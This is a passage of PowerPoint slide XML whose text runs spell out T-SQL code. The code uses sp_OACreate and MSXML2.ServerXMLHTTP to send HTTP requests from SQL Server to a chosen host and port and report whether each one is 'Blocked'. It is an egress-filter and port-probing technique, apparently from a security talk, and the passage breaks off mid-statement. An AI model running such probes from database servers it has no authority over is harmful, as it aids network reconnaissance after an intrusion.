              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>INT,@rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>INT,@rse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>INT,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>INT,@s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> varchar(60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>='http://'+@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>host+':'+@port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sp_OACreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 'MSXML2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ServerXMLHTTP'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>OUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sp_OAMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>setTimeouts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>', NULL, 3000, 3000, 3000, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>3000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sp_OAMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, 'open', NULL, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>GET',@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sp_OAMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>send’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sp_OAGetProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, 'status', @status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>OUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>sp_OADestroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+CASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> WHEN -2147012891 THEN 'Blocked' WHEN 0 THEN CASE @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rse</a:t>
            </a:r>
            <a:r>
